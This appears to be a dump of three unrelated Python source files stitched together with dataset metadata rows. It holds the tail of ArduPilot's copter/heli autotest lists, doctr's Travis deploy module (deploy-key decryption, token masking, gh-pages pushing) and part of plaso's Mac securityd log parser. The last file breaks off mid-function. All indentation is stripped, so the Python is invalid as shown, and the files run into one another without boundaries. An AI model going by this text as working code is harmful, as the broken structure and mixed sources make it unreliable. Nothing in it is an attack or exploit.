("MagFail",
"Test magnetometer failure",
self.test_mag_fail),
("OpticalFlowLimits",
"Fly Optical Flow limits",
self.fly_optical_flow_limits), # 27s
("MotorFail",
"Fly motor failure test",
self.fly_motor_fail),
("Flip",
"Fly Flip Mode",
self.fly_flip),
("CopterMission",
"Fly copter mission",
self.fly_auto_test), # 37s
("SplineLastWaypoint",
"Test Spline as last waypoint",
self.test_spline_last_waypoint),
("Gripper",
"Test gripper",
self.test_gripper), # 28s
("TestGripperMission",
"Test Gripper mission items",
self.test_gripper_mission),
("VisionPosition",
"Fly Vision Position",
self.fly_vision_position), # 24s
("GPSViconSwitching",
"Fly GPS and Vicon Switching",
self.fly_gps_vicon_switching),
])
return ret
def tests1e(self):
'''return list of all tests'''
ret = ([
("BeaconPosition",
"Fly Beacon Position",
self.fly_beacon_position), # 56s
("RTLSpeed",
"Fly RTL Speed",
self.fly_rtl_speed),
("Mount",
"Test Camera/Antenna Mount",
self.test_mount), # 74s
("Button",
"Test Buttons",
self.test_button),
("ShipTakeoff",
"Fly Simulated Ship Takeoff",
self.fly_ship_takeoff),
("RangeFinder",
"Test RangeFinder Basic Functionality",
self.test_rangefinder), # 23s
("SurfaceTracking",
"Test Surface Tracking",
self.test_surface_tracking), # 45s
("Parachute",
"Test Parachute Functionality",
self.test_parachute),
("ParameterChecks",
"Test Arming Parameter Checks",
self.test_parameter_checks),
("ManualThrottleModeChange",
"Check manual throttle mode changes denied on high throttle",
self.fly_manual_throttle_mode_change),
("MANUAL_CONTROL",
"Test mavlink MANUAL_CONTROL",
self.test_manual_control),
("ZigZag",
"Fly ZigZag Mode",
self.fly_zigzag_mode), # 58s
("PosHoldTakeOff",
"Fly POSHOLD takeoff",
self.fly_poshold_takeoff),
("FOLLOW",
"Fly follow mode",
self.fly_follow_mode), # 80s
("RangeFinderDrivers",
"Test rangefinder drivers",
self.fly_rangefinder_drivers), # 62s
("MaxBotixI2CXL",
"Test maxbotix rangefinder drivers",
self.fly_rangefinder_driver_maxbotix), # 62s
("MAVProximity",
"Test MAVLink proximity driver",
self.fly_proximity_mavlink_distance_sensor,
),
("ParameterValidation",
"Test parameters are checked for validity",
self.test_parameter_validation),
("AltTypes",
"Test Different Altitude Types",
self.test_altitude_types),
("RichenPower",
"Test RichenPower generator",
self.test_richenpower),
("IE24",
"Test IntelligentEnergy 2.4kWh generator",
self.test_ie24),
("LogUpload",
"Log upload",
self.log_upload),
])
return ret
# a wrapper around all the 2A,2B,2C..etc tests for travis
def tests2(self):
ret = ([])
ret.extend(self.tests2a())
ret.extend(self.tests2b())
return ret
def tests2a(self):
'''return list of all tests'''
ret = ([
# something about SITLCompassCalibration appears to fail
# this one, so we put it first:
("FixedYawCalibration",
"Test Fixed Yaw Calibration", # about 20 secs
self.test_fixed_yaw_calibration),
# we run this single 8min-and-40s test on its own, apart from
# requiring FixedYawCalibration right before it because without it, it fails to calibrate
("SITLCompassCalibration", # this autotest appears to interfere with FixedYawCalibration, no idea why.
"Test SITL onboard compass calibration",
self.test_mag_calibration),
])
return ret
def tests2b(self): # this block currently around 9.5mins here
'''return list of all tests'''
ret = ([
Test("MotorVibration",
"Fly motor vibration test",
self.fly_motor_vibration),
Test("DynamicNotches",
"Fly Dynamic Notches",
self.fly_dynamic_notches,
attempts=8),
Test("PositionWhenGPSIsZero",
"Ensure position doesn't zero when GPS lost",
self.test_copter_gps_zero),
Test("GyroFFT",
"Fly Gyro FFT",
self.fly_gyro_fft,
attempts=8),
Test("GyroFFTHarmonic",
"Fly Gyro FFT Harmonic Matching",
self.fly_gyro_fft_harmonic,
attempts=8),
Test("CompassReordering",
"Test Compass reordering when priorities are changed",
self.test_mag_reordering), # 40sec?
Test("CRSF",
"Test RC CRSF",
self.test_crsf), # 20secs ish
Test("MotorTest",
"Run Motor Tests",
self.test_motortest), # 20secs ish
Test("AltEstimation",
"Test that Alt Estimation is mandatory for ALT_HOLD",
self.test_alt_estimate_prearm), # 20secs ish
Test("EKFSource",
"Check EKF Source Prearms work",
self.test_ekf_source),
Test("GSF",
"Check GSF",
self.test_gsf),
Test("FlyEachFrame",
"Fly each supported internal frame",
self.fly_each_frame),
Test("GPSBlending",
"Test GPS Blending",
self.test_gps_blending),
Test("DataFlash",
"Test DataFlash Block backend",
self.test_dataflash_sitl),
Test("DataFlashErase",
"Test DataFlash Block backend erase",
self.test_dataflash_erase),
Test("Callisto",
"Test Callisto",
self.test_callisto),
Test("Replay",
"Test Replay",
self.test_replay),
Test("LogUpload",
"Log upload",
self.log_upload),
])
return ret
def testcan(self):
ret = ([
("CANGPSCopterMission",
"Fly copter mission",
self.fly_auto_test_using_can_gps),
])
return ret
def tests(self):
ret = []
ret.extend(self.tests1())
ret.extend(self.tests2())
return ret
def disabled_tests(self):
return {
"Parachute": "See https://github.com/ArduPilot/ardupilot/issues/4702",
"HorizontalAvoidFence": "See https://github.com/ArduPilot/ardupilot/issues/11525",
"AltEstimation": "See https://github.com/ArduPilot/ardupilot/issues/15191",
}
class AutoTestHeli(AutoTestCopter):
def log_name(self):
return "HeliCopter"
def default_frame(self):
return "heli"
def sitl_start_location(self):
return SITL_START_LOCATION_AVC
def default_speedup(self):
'''Heli seems to be race-free'''
return 100
def is_heli(self):
return True
def rc_defaults(self):
ret = super(AutoTestHeli, self).rc_defaults()
ret[8] = 1000
ret[3] = 1000 # collective
return ret
@staticmethod
def get_position_armable_modes_list():
'''filter THROW mode out of armable modes list; Heli is special-cased'''
ret = AutoTestCopter.get_position_armable_modes_list()
ret = filter(lambda x : x != "THROW", ret)
return ret
def loiter_requires_position(self):
self.progress("Skipping loiter-requires-position for heli; rotor runup issues")
def get_collective_out(self):
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW', blocking=True)
chan_pwm = (servo.servo1_raw + servo.servo2_raw + servo.servo3_raw)/3.0
return chan_pwm
def rotor_runup_complete_checks(self):
# Takeoff and landing in Loiter
TARGET_RUNUP_TIME = 10
self.zero_throttle()
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW', blocking=True)
coll = servo.servo1_raw
coll = coll + 50
self.set_parameter("H_RSC_RUNUP_TIME", TARGET_RUNUP_TIME)
self.progress("Initiate Runup by putting some throttle")
self.set_rc(8, 2000)
self.set_rc(3, 1700)
self.progress("Collective threshold PWM %u" % coll)
tstart = self.get_sim_time()
self.progress("Wait that collective PWM pass threshold value")
servo = self.mav.recv_match(condition='SERVO_OUTPUT_RAW.servo1_raw>%u' % coll, blocking=True)
runup_time = self.get_sim_time() - tstart
self.progress("Collective is now at PWM %u" % servo.servo1_raw)
self.mav.wait_heartbeat()
if runup_time < TARGET_RUNUP_TIME:
self.zero_throttle()
self.set_rc(8, 1000)
self.disarm_vehicle()
self.mav.wait_heartbeat()
raise NotAchievedException("Takeoff initiated before runup time complete %u" % runup_time)
self.progress("Runup time %u" % runup_time)
self.zero_throttle()
self.set_rc(8, 1000)
self.land_and_disarm()
self.mav.wait_heartbeat()
# fly_avc_test - fly AVC mission
def fly_avc_test(self):
# Arm
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
# upload mission from file
self.progress("# Load copter_AVC2013_mission")
# load the waypoint count
num_wp = self.load_mission("copter_AVC2013_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_AVC2013_mission failed")
self.progress("Fly AVC mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
# wait for motor runup
self.delay_sim_time(20)
# switch into AUTO mode and raise throttle
self.change_mode('AUTO')
self.set_rc(3, 1500)
# fly the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# set throttle to minimum
self.zero_throttle()
# wait for disarm
self.wait_disarmed()
self.progress("MOTORS DISARMED OK")
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
self.progress("AVC mission completed: passed!")
def fly_heli_poshold_takeoff(self):
"""ensure vehicle stays put until it is ready to fly"""
self.context_push()
ex = None
try:
self.set_parameter("PILOT_TKOFF_ALT", 700)
self.change_mode('POSHOLD')
self.zero_throttle()
self.set_rc(8, 1000)
self.wait_ready_to_arm()
# Arm
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_relalt_mm = 1000
if abs(m.relative_alt) > max_relalt_mm:
raise NotAchievedException("Took off prematurely (abs(%f)>%f)" %
(m.relative_alt, max_relalt_mm))
self.progress("Pushing collective past half-way")
self.set_rc(3, 1600)
self.delay_sim_time(0.5)
self.progress("Bringing back to hover collective")
self.set_rc(3, 1500)
# make sure we haven't already reached alt:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 500:
raise NotAchievedException("Took off too fast")
self.progress("Monitoring takeoff-to-alt")
self.wait_altitude(6.9, 8, relative=True)
self.progress("Making sure we stop at our takeoff altitude")
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 5:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
delta = abs(7000 - m.relative_alt)
self.progress("alt=%f delta=%f" % (m.relative_alt/1000,
delta/1000))
if delta > 1000:
raise NotAchievedException("Failed to maintain takeoff alt")
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def fly_heli_stabilize_takeoff(self):
""""""
self.context_push()
ex = None
try:
self.change_mode('STABILIZE')
self.set_rc(3, 1000)
self.set_rc(8, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 100:
raise NotAchievedException("Took off prematurely")
self.progress("Pushing throttle past half-way")
self.set_rc(3, 1600)
self.progress("Monitoring takeoff")
self.wait_altitude(6.9, 8, relative=True)
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def fly_spline_waypoint(self, timeout=600):
"""ensure basic spline functionality works"""
self.load_mission("copter_spline_mission.txt", strict=False)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.progress("Raising rotor speed")
self.set_rc(8, 2000)
self.delay_sim_time(20)
self.change_mode("AUTO")
self.set_rc(3, 1500)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > timeout:
raise AutoTestTimeoutException("Vehicle did not disarm after mission")
if not self.armed():
break
self.delay_sim_time(1)
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
def fly_autorotation(self, timeout=600):
"""ensure basic spline functionality works"""
self.set_parameter("AROT_ENABLE", 1)
start_alt = 100 # metres
self.set_parameter("PILOT_TKOFF_ALT", start_alt * 100)
self.change_mode('POSHOLD')
self.set_rc(3, 1000)
self.set_rc(8, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(8, 2000)
self.progress("wait for rotor runup to complete")
self.wait_servo_channel_value(8, 1660, timeout=10)
self.delay_sim_time(20)
self.set_rc(3, 2000)
self.wait_altitude(start_alt - 1,
(start_alt + 5),
relative=True,
timeout=timeout)
self.context_collect('STATUSTEXT')
self.progress("Triggering autorotate by raising interlock")
self.set_rc(8, 1000)
self.wait_statustext("SS Glide Phase", check_context=True)
self.wait_statustext(r"SIM Hit ground at ([0-9.]+) m/s",
check_context=True,
regex=True)
speed = float(self.re_match.group(1))
if speed > 30:
raise NotAchievedException("Hit too hard")
self.wait_disarmed()
def set_rc_default(self):
super(AutoTestHeli, self).set_rc_default()
self.progress("Lowering rotor speed")
self.set_rc(8, 1000)
def tests(self):
'''return list of all tests'''
ret = AutoTest.tests(self)
ret.extend([
("AVCMission", "Fly AVC mission", self.fly_avc_test),
("RotorRunUp",
"Test rotor runup",
self.rotor_runup_complete_checks),
("PosHoldTakeOff",
"Fly POSHOLD takeoff",
self.fly_heli_poshold_takeoff),
("StabilizeTakeOff",
"Fly stabilize takeoff",
self.fly_heli_stabilize_takeoff),
("SplineWaypoint",
"Fly Spline Waypoints",
self.fly_spline_waypoint),
("AutoRotation",
"Fly AutoRotation",
self.fly_autorotation),
("LogUpload",
"Log upload",
self.log_upload),
])
return ret
def disabled_tests(self):
return {
"SplineWaypoint": "See https://github.com/ArduPilot/ardupilot/issues/14593",
}
class AutoTestCopterTests1(AutoTestCopter):
def tests(self):
return self.tests1()
class AutoTestCopterTests1a(AutoTestCopter):
def tests(self):
return self.tests1a()
class AutoTestCopterTests1b(AutoTestCopter):
def tests(self):
return self.tests1b()
class AutoTestCopterTests1c(AutoTestCopter):
def tests(self):
return self.tests1c()
class AutoTestCopterTests1d(AutoTestCopter):
def tests(self):
return self.tests1d()
class AutoTestCopterTests1e(AutoTestCopter):
def tests(self):
return self.tests1e()
class AutoTestCopterTests2(AutoTestCopter):
def tests(self):
return self.tests2()
class AutoTestCopterTests2a(AutoTestCopter):
def tests(self):
return self.tests2a()
class AutoTestCopterTests2b(AutoTestCopter):
def tests(self):
return self.tests2b()
class AutoTestCAN(AutoTestCopter):
def tests(self):
return self.testcan()
| gpl-3.0 | 940,847,501,828,778,200 | 37.953043 | 127 | 0.537486 | false |
gforsyth/doctr_testing | doctr/travis.py | 1 | 12160 | """
The code that should be run on Travis
"""
import os
import shlex
import shutil
import subprocess
import sys
import glob
from cryptography.fernet import Fernet
def decrypt_file(file, key):
"""
Decrypts the file ``file``.
The encrypted file is assumed to end with the ``.enc`` extension. The
decrypted file is saved to the same location without the ``.enc``
extension.
The permissions on the decrypted file are automatically set to 0o600.
See also :func:`doctr.local.encrypt_file`.
"""
if not file.endswith('.enc'):
raise ValueError("%s does not end with .enc" % file)
fer = Fernet(key)
with open(file, 'rb') as f:
decrypted_file = fer.decrypt(f.read())
with open(file[:-4], 'wb') as f:
f.write(decrypted_file)
os.chmod(file[:-4], 0o600)
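# Hedged usage sketch (not part of the original doctr source; the file name
# is an illustrative assumption): round-trip a payload through Fernet and
# decrypt_file().
def _decrypt_file_demo(path='demo_secret'):
    key = Fernet.generate_key()
    with open(path + '.enc', 'wb') as f:
        f.write(Fernet(key).encrypt(b'hello'))
    decrypt_file(path + '.enc', key)
    with open(path, 'rb') as f:
        assert f.read() == b'hello'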
def setup_deploy_key(keypath='github_deploy_key', key_ext='.enc'):
"""
Decrypts the deploy key and configures it with ssh
The key is assumed to be encrypted as keypath + key_ext, and the
encryption key is assumed to be set in the environment variable
DOCTR_DEPLOY_ENCRYPTION_KEY.
"""
key = os.environ.get("DOCTR_DEPLOY_ENCRYPTION_KEY", None)
if not key:
raise RuntimeError("DOCTR_DEPLOY_ENCRYPTION_KEY environment variable is not set")
key_filename = os.path.basename(keypath)
key = key.encode('utf-8')
decrypt_file(keypath + key_ext, key)
key_path = os.path.expanduser("~/.ssh/" + key_filename)
os.makedirs(os.path.expanduser("~/.ssh"), exist_ok=True)
os.rename(keypath, key_path)
with open(os.path.expanduser("~/.ssh/config"), 'a') as f:
f.write("Host github.com"
' IdentityFile "%s"'
" LogLevel ERROR\n" % key_path)
# start ssh-agent and add key to it
# info from SSH agent has to be put into the environment
agent_info = subprocess.check_output(['ssh-agent', '-s'])
agent_info = agent_info.decode('utf-8')
agent_info = agent_info.split()
AUTH_SOCK = agent_info[0].split('=')[1][:-1]
AGENT_PID = agent_info[3].split('=')[1][:-1]
os.putenv('SSH_AUTH_SOCK', AUTH_SOCK)
os.putenv('SSH_AGENT_PID', AGENT_PID)
run(['ssh-add', os.path.expanduser('~/.ssh/' + key_filename)])
# XXX: Do this in a way that is streaming
def run_command_hiding_token(args, token):
command = ' '.join(map(shlex.quote, args))
command = command.replace(token.decode('utf-8'), '~'*len(token))
print(command)
p = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.stdout, p.stderr
out = out.replace(token, b"~"*len(token))
err = err.replace(token, b"~"*len(token))
return (out, err, p.returncode)
def get_token():
"""
Get the encrypted GitHub token in Travis.
    Make sure the contents of this variable do not leak. The ``run()`` function
will remove this from the output, so always use it.
"""
token = os.environ.get("GH_TOKEN", None)
if not token:
raise RuntimeError("GH_TOKEN environment variable not set")
token = token.encode('utf-8')
return token
def run(args):
"""
Run the command ``args``.
Automatically hides the secret GitHub token from the output.
"""
if "DOCTR_DEPLOY_ENCRYPTION_KEY" in os.environ:
token = b''
else:
token = get_token()
out, err, returncode = run_command_hiding_token(args, token)
if out:
print(out.decode('utf-8'))
if err:
print(err.decode('utf-8'), file=sys.stderr)
if returncode != 0:
sys.exit(returncode)
def get_current_repo():
"""
Get the GitHub repo name for the current directory.
Assumes that the repo is in the ``origin`` remote.
"""
remote_url = subprocess.check_output(['git', 'config', '--get',
'remote.origin.url']).decode('utf-8')
# Travis uses the https clone url
_, org, git_repo = remote_url.rsplit('.git', 1)[0].rsplit('/', 2)
return (org + '/' + git_repo)
def setup_GitHub_push(deploy_repo, auth_type='deploy_key', full_key_path='github_deploy_key.enc', require_master=True, deploy_branch='gh-pages'):
"""
Setup the remote to push to GitHub (to be run on Travis).
``auth_type`` should be either ``'deploy_key'`` or ``'token'``.
For ``auth_type='token'``, this sets up the remote with the token and
checks out the gh-pages branch. The token to push to GitHub is assumed to be in the ``GH_TOKEN`` environment
variable.
For ``auth_type='deploy_key'``, this sets up the remote with ssh access.
"""
if auth_type not in ['deploy_key', 'token']:
raise ValueError("auth_type must be 'deploy_key' or 'token'")
TRAVIS_BRANCH = os.environ.get("TRAVIS_BRANCH", "")
TRAVIS_PULL_REQUEST = os.environ.get("TRAVIS_PULL_REQUEST", "")
if TRAVIS_BRANCH != "master" and require_master:
print("The docs are only pushed to {} from master. To allow pushing from "
"a non-master branch, use the --no-require-master flag".format(deploy_branch), file=sys.stderr)
print("This is the {TRAVIS_BRANCH} branch".format(TRAVIS_BRANCH=TRAVIS_BRANCH), file=sys.stderr)
return False
if TRAVIS_PULL_REQUEST != "false":
print("The website and docs are not pushed to {} on pull requests".format(deploy_branch),
file=sys.stderr)
return False
print("Setting git attributes")
# Should we add some user.email?
run(['git', 'config', '--global', 'user.name', "Doctr (Travis CI)"])
remotes = subprocess.check_output(['git', 'remote']).decode('utf-8').split('\n')
if 'doctr_remote' in remotes:
print("doctr_remote already exists, removing")
run(['git', 'remote', 'remove', 'doctr_remote'])
print("Adding doctr remote")
if auth_type == 'token':
token = get_token()
run(['git', 'remote', 'add', 'doctr_remote',
'https://{token}@github.com/{deploy_repo}.git'.format(token=token.decode('utf-8'),
deploy_repo=deploy_repo)])
else:
keypath, key_ext = full_key_path.rsplit('.', 1)
key_ext = '.' + key_ext
setup_deploy_key(keypath=keypath, key_ext=key_ext)
run(['git', 'remote', 'add', 'doctr_remote',
'[email protected]:{deploy_repo}.git'.format(deploy_repo=deploy_repo)])
print("Fetching doctr remote")
run(['git', 'fetch', 'doctr_remote'])
    # create empty branch with .nojekyll if it doesn't already exist
new_deploy_branch = create_deploy_branch(deploy_branch)
print("Checking out {}".format(deploy_branch))
local_deploy_branch_exists = deploy_branch in subprocess.check_output(['git', 'branch']).decode('utf-8').split()
if new_deploy_branch or local_deploy_branch_exists:
run(['git', 'checkout', deploy_branch])
run(['git', 'pull', 'doctr_remote', deploy_branch])
else:
run(['git', 'checkout', '-b', deploy_branch, '--track',
'doctr_remote/{}'.format(deploy_branch)])
print("Done")
return True
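# Hedged example call (illustrative only; the repo name and key path are
# assumptions, not values taken from this module):
#
#     if setup_GitHub_push('myorg/myrepo', auth_type='deploy_key',
#                          full_key_path='github_deploy_key.enc'):
#         ...  # build the docs, then commit_docs() and push_docs()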
def deploy_branch_exists(deploy_branch='gh-pages'):
"""Check if the remote deploy branch exists
This isn't completely robust. If there are multiple remotes and the branch
is created on the non-default remote, this won't see it.
"""
remote_name = 'doctr_remote'
branch_names = subprocess.check_output(['git', 'branch', '-r']).decode('utf-8').split()
return '{remote}/{branch}'.format(remote=remote_name,
branch=deploy_branch) in branch_names
def create_deploy_branch(deploy_branch):
"""
If there is no remote deploy branch, create one.
Return True if branch was created, False if not.
Default value for deploy_branch is ``gh-pages``
"""
if not deploy_branch_exists(deploy_branch):
print("Creating {} branch".format(deploy_branch))
run(['git', 'checkout', '--orphan', deploy_branch])
# delete everything in the new ref. this is non-destructive to existing
# refs/branches, etc...
run(['git', 'rm', '-rf', '.'])
print("Adding .nojekyll file to {}".format(deploy_branch))
run(['touch', '.nojekyll'])
run(['git', 'add', '.nojekyll'])
run(['git', 'commit', '-m', 'Create new branch {} with .nojekyll'.format(deploy_branch)])
print("Pushing branch {} to remote".format(deploy_branch))
run(['git', 'push', '-u', 'doctr_remote', deploy_branch])
# return to master branch
run(['git', 'checkout', '-'])
return True
return False
def find_sphinx_build_dir():
"""
Find build subfolder within sphinx docs directory.
This is called by :func:`commit_docs` if keyword arg ``built_docs`` is not
specified on the command line.
"""
build = glob.glob('**/*build/html', recursive=True)
if not build:
raise RuntimeError("Could not find Sphinx build directory automatically")
build_folder = build[0]
return build_folder
# Here is the logic to get the Travis job number, to only run commit_docs in
# the right build.
#
# TRAVIS_JOB_NUMBER = os.environ.get("TRAVIS_JOB_NUMBER", '')
# ACTUAL_TRAVIS_JOB_NUMBER = TRAVIS_JOB_NUMBER.split('.')[1]
def sync_from_log(src, dst, log_file):
"""
Sync the files in ``src`` to ``dst``.
The files that are synced are logged to ``log_file``. If ``log_file``
exists, the files in ``log_file`` are removed first.
Returns ``(added, removed)``, where added is a list of all files synced from
``src`` (even if it already existed in ``dst``), and ``removed`` is every
file from ``log_file`` that was removed from ``dst`` because it wasn't in
``src``. ``added`` also includes the log file.
"""
from os.path import join, exists, isdir
if not src.endswith(os.sep):
src += os.sep
added, removed = [], []
if not exists(log_file):
# Assume this is the first run
print("%s doesn't exist. Not removing any files." % log_file)
else:
with open(log_file) as f:
files = f.read().strip().split('\n')
for new_f in files:
new_f = new_f.strip()
if exists(new_f):
os.remove(new_f)
removed.append(new_f)
else:
print("Warning: File %s doesn't exist." % new_f, file=sys.stderr)
files = glob.iglob(join(src, '**'), recursive=True)
# sorted makes this easier to test
for f in sorted(files):
new_f = join(dst, f[len(src):])
if isdir(f):
os.makedirs(new_f, exist_ok=True)
else:
shutil.copy2(f, new_f)
added.append(new_f)
if new_f in removed:
removed.remove(new_f)
with open(log_file, 'w') as f:
f.write('\n'.join(added))
added.append(log_file)
return added, removed
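# Hedged sketch (not in the original module; the paths are illustrative): a
# typical flow syncs a Sphinx build tree into the repository root and records
# what was copied so the next run can prune files that disappeared upstream.
def _sync_from_log_demo():
    added, removed = sync_from_log('docs/_build/html', '.', '.doctr-files')
    print('synced %d files, pruned %d stale ones' % (len(added), len(removed)))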
def commit_docs(*, added, removed):
"""
Commit the docs to ``gh-pages`` or a specified deploy branch.
Assumes that :func:`setup_GitHub_push`, which sets up the ``doctr_remote``
remote, has been run and returned True.
Returns True if changes were committed and False if no changes were
committed.
"""
TRAVIS_BUILD_NUMBER = os.environ.get("TRAVIS_BUILD_NUMBER", "<unknown>")
for f in added:
run(['git', 'add', f])
for f in removed:
run(['git', 'rm', f])
# Only commit if there were changes
if subprocess.run(['git', 'diff-index', '--quiet', 'HEAD', '--'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE).returncode != 0:
print("Committing")
run(['git', 'commit', '-am', "Update docs after building Travis build " + TRAVIS_BUILD_NUMBER])
return True
return False
def push_docs(deploy_branch='gh-pages'):
"""
Push the changes to the ``gh-pages`` branch or specified deploy branch.
Assumes that :func:`setup_GitHub_push` has been run and returned True, and
that :func:`commit_docs` has been run. Does not push anything if no changes
were made.
"""
print("Pulling")
run(['git', 'pull'])
print("Pushing commit")
run(['git', 'push', '-q', 'doctr_remote', deploy_branch])
| mit | -1,302,443,846,925,126,700 | 33.842407 | 145 | 0.616283 | false |
cvandeplas/plaso | plaso/parsers/mac_securityd.py | 1 | 9467 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains the ASL securityd log plaintext parser."""
import datetime
import logging
import pyparsing
from plaso.events import time_events
from plaso.lib import eventdata
from plaso.lib import timelib
from plaso.parsers import manager
from plaso.parsers import text_parser
__author__ = 'Joaquin Moreno Garijo ([email protected])'
# INFO:
# http://opensource.apple.com/source/Security/Security-55471/sec/securityd/
class MacSecuritydLogEvent(time_events.TimestampEvent):
"""Convenience class for a ASL securityd line event."""
DATA_TYPE = 'mac:asl:securityd:line'
def __init__(
self, timestamp, structure, sender, sender_pid,
security_api, caller, message):
"""Initializes the event object.
Args:
      timestamp: The timestamp value, in epoch form.
      structure: Structure with the parse fields; it also carries the
          priority level and the ASL facility.
sender: String with the name of the sender.
sender_pid: Process id of the sender.
security_api: Securityd function name.
caller: The caller field, a string containing two hex numbers.
message: String with the ASL message.
"""
super(MacSecuritydLogEvent, self).__init__(
timestamp,
eventdata.EventTimestamp.ADDED_TIME)
self.timestamp = timestamp
self.level = structure.level
self.sender_pid = sender_pid
self.facility = structure.facility
self.sender = sender
self.security_api = security_api
self.caller = caller
self.message = message
class MacSecuritydLogParser(text_parser.PyparsingSingleLineTextParser):
"""Parses the securityd file that contains logs from the security daemon."""
NAME = 'mac_securityd'
DESCRIPTION = u'Parser for Mac OS X securityd log files.'
ENCODING = u'utf-8'
# Default ASL Securityd log.
SECURITYD_LINE = (
text_parser.PyparsingConstants.MONTH.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME.setResultsName('time') +
pyparsing.CharsNotIn(u'[').setResultsName('sender') +
pyparsing.Literal(u'[').suppress() +
text_parser.PyparsingConstants.PID.setResultsName('sender_pid') +
pyparsing.Literal(u']').suppress() +
pyparsing.Literal(u'<').suppress() +
pyparsing.CharsNotIn(u'>').setResultsName('level') +
pyparsing.Literal(u'>').suppress() +
pyparsing.Literal(u'[').suppress() +
pyparsing.CharsNotIn(u'{').setResultsName('facility') +
pyparsing.Literal(u'{').suppress() +
pyparsing.Optional(pyparsing.CharsNotIn(
u'}').setResultsName('security_api')) +
pyparsing.Literal(u'}').suppress() +
pyparsing.Optional(pyparsing.CharsNotIn(u']:').setResultsName('caller')) +
pyparsing.Literal(u']:').suppress() +
pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('message'))
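  # Illustrative line shape matched by SECURITYD_LINE (constructed from the
  # grammar above, not copied from a real capture):
  #   Feb 26 19:11:56 securityd[224] <Error>[serverxpc{SOSCCSyncWithPeers}C0xa1b,C0xa1c]: sync failed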
# Repeated line.
REPEATED_LINE = (
text_parser.PyparsingConstants.MONTH.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME.setResultsName('time') +
pyparsing.Literal(u'--- last message repeated').suppress() +
text_parser.PyparsingConstants.INTEGER.setResultsName('times') +
pyparsing.Literal(u'time ---').suppress())
# Define the available log line structures.
LINE_STRUCTURES = [
('logline', SECURITYD_LINE),
('repeated', REPEATED_LINE)]
def __init__(self):
"""Initializes a parser object."""
super(MacSecuritydLogParser, self).__init__()
self._year_use = 0
self._last_month = None
self.previous_structure = None
def VerifyStructure(self, parser_context, line):
"""Verify that this file is a ASL securityd log file.
Args:
parser_context: A parser context object (instance of ParserContext).
line: A single line from the text file.
Returns:
True if this is the correct parser, False otherwise.
"""
try:
line = self.SECURITYD_LINE.parseString(line)
except pyparsing.ParseException:
      logging.debug(u'Not an ASL securityd log file')
return False
    # Check whether the day, month and time are valid, using an arbitrary year.
month = timelib.MONTH_DICT.get(line.month.lower())
if not month:
return False
if self._GetTimestamp(line.day, month, 2012, line.time) == 0:
return False
return True
def ParseRecord(self, parser_context, key, structure):
"""Parse each record structure and return an EventObject if applicable.
Args:
parser_context: A parser context object (instance of ParserContext).
key: An identification string indicating the name of the parsed
structure.
structure: A pyparsing.ParseResults object from a line in the
log file.
Returns:
An event object (instance of EventObject) or None.
"""
if key == 'repeated' or key == 'logline':
return self._ParseLogLine(parser_context, structure, key)
else:
logging.warning(
u'Unable to parse record, unknown structure: {0:s}'.format(key))
def _ParseLogLine(self, parser_context, structure, key):
"""Parse a logline and store appropriate attributes.
Args:
parser_context: A parser context object (instance of ParserContext).
key: An identification string indicating the name of the parsed
structure.
structure: A pyparsing.ParseResults object from a line in the
log file.
Returns:
An event object (instance of EventObject) or None.
"""
    # TODO: improve this to get a valid year.
if not self._year_use:
self._year_use = parser_context.year
if not self._year_use:
# Get from the creation time of the file.
self._year_use = self._GetYear(
self.file_entry.GetStat(), parser_context.timezone)
# If fail, get from the current time.
if not self._year_use:
self._year_use = timelib.GetCurrentYear()
# Gap detected between years.
month = timelib.MONTH_DICT.get(structure.month.lower())
if not self._last_month:
self._last_month = month
if month < self._last_month:
self._year_use += 1
timestamp = self._GetTimestamp(
structure.day,
month,
self._year_use,
structure.time)
if not timestamp:
